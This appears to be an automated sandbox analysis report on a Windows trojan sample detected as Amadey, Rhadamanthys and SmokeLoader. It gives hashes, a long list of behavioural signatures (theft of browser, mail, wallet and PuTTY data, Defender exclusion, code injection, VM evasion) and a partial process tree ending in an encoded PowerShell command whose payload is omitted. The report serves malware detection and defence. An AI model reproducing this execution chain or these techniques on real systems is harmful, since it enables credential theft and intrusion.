Windows
Analysis Report
xwREqjHUEv.exe
Overview
General Information
Sample name: | xwREqjHUEv.exe (renamed because the original name is a hash value) |
Original sample name: | 068c05b9f062da142d266a374866d3bb.exe |
Analysis ID: | 1423732 |
MD5: | 068c05b9f062da142d266a374866d3bb |
SHA1: | 315726e1015e1e69cf9645bda713f463e93a8755 |
SHA256: | cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a |
Tags: | 32, exe, trojan |
Detection
Amadey, RHADAMANTHYS, SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadey's stealer DLL
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected RHADAMANTHYS Stealer
Yara detected SmokeLoader
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- xwREqjHUEv.exe (PID: 1788 cmdline: "C:\Users\user\Desktop\xwREqjHUEv.exe" MD5: 068C05B9F062DA142D266A374866D3BB)
- wscript.exe (PID: 6548 cmdline: "wscript.exe" "C:\Users\user\start.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- cmd.exe (PID: 3816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2964 cmdline:
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('<base64-encoded PowerShell payload omitted; the report is truncated at this point>